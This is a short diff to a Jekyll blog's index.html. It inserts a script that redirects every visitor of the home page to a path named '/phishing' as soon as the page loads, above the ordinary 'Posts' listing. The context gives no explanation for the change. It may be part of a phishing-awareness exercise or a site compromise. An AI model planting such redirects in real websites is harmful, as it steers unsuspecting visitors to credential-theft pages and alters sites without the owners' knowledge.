--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 ---
 layout: default
 ---
-
+<script>window.location.href= "/phishing";</script>
 <div class="home">
 
   <h1 class="page-heading">Posts</h1>
